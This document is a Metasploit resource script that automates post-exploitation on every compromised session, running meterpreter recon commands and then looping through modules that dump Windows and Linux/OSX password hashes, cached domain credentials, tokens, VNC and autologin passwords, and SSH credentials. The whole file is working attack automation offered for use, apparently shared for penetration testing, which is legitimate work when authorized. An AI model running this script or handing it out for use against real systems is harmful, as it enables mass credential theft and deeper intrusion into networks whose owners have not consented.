# multi_post.rc # Author: m-1-k-3 (Web: http://www.s3cur1ty.de / Twitter: @s3cur1ty_de) # This Metasploit RC-File could be used to automate the post-exploitation process # VERBOSE is used from the global datastore # check out the meterpreter_commands and the modules_win and modules_lin and modules_multi # you could add your own post exploitation modules into them #we look in the global datastore for a global VERBOSE option and use it if (framework.datastore['VERBOSE'] == "true") verbose = 1 #true else verbose = 0 end meterpreter_commands = Array.new if (framework.datastore['METER_AUTO_COM'] != nil) #we look in the global datastore for a global METER_AUTO_COM option and use it meterpreter_commands = framework.datastore['METER_AUTO_COM'].split(" ") else meterpreter_commands = [ 'sysinfo', 'getuid', 'getpid', 'ps', 'ipconfig' ] end if (framework.datastore['MOD_WIN'] != nil) #we look in the global datastore for a global METER_AUTO_COM option and use it modules_win = framework.datastore['MOD_WIN'].split(" ") else modules_win = [ 'post/windows/gather/hashdump', 'post/windows/gather/cachedump', 'post/windows/gather/smart_hashdump', 'post/windows/gather/enum_tokens', 'post/windows/gather/enum_domain', 'post/windows/gather/enum_domain_group_users', 'post/windows/gather/enum_domain_tokens', 'post/windows/gather/enum_hostfile', 'post/windows/gather/enum_ie', 'post/windows/gather/enum_logged_on_users', 'post/windows/gather/enum_ms_product_keys', 'post/windows/gather/credentials/vnc', 'post/windows/gather/credentials/windows_autologin', 'post/windows/gather/checkvm', 'post/windows/gather/enum_applications', 'post/windows/gather/enum_services', 'post/windows/gather/enum_shares', 'post/windows/gather/enum_snmp', 'post/windows/gather/enum_devices', 'post/windows/gather/enum_powershell_env' ] # add some more modules or comment some out ... end if (framework.datastore['MOD_LIN'] != nil) #we look in the global datastore for a global METER_AUTO_COM option and use it modules_lin = framework.datastore['MOD_LIN'].split(" ") else modules_lin = [ 'post/linux/gather/hashdump', 'post/osx/gather/hashdump', 'post/linux/gather/enum_network', 'post/linux/gather/enum_system', 'post/linux/gather/enum_users_history', 'post/linux/gather/checkvm', 'post/osx/gather/enum_osx' ] end if (framework.datastore['MOD_MULTI'] != nil) #we look in the global datastore for a global METER_AUTO_COM option and use it modules_multi = framework.datastore['MOD_MULTI'].split(" ") else modules_multi = [ 'post/multi/gather/env', 'post/multi/gather/ssh_creds' ] end # lets start if we have a session if (framework.sessions.length > 0) print_status("starting with post exploitation stuff") framework.sessions.each_key do |sid| session = framework.sessions[sid] #meterpreter commands against every meterpreter session if(session.type == "meterpreter") print_line("starting meterpreter commands on session number #{sid}") meterpreter_commands.each { |command| print_line("running meterpreter command #{command}") session.console.run_single("#{command.to_s}") print_line } end end print_status("starting the post exploitation with post exploitation modules") # lets start with post exploitation modules framework.sessions.each_key do |sid| session = framework.sessions[sid] ips = session.session_host print_status("Session ID: #{sid.to_i} - IP: #{ips}") # multi -> all sessions modules_multi.each { |modul| run_single("use #{modul}") run_single("set SESSION #{sid}") if (verbose == 1) run_single("run -j") else run_single("run -j -q") end } # windows sessions if(session.platform =~ /win/) modules_win.each { |modul| run_single("use #{modul}") run_single("set SESSION #{sid}") if (verbose == 1) run_single("run -j") else run_single("run -j -q") end } else # all other sessions -> typical some linux or unix based systems modules_lin.each { |modul| run_single("use #{modul}") run_single("set SESSION #{sid}") if (verbose == 1) run_single("run -j") else run_single("run -j -q") end } end end else print_error("no sessions available") end run_single("back")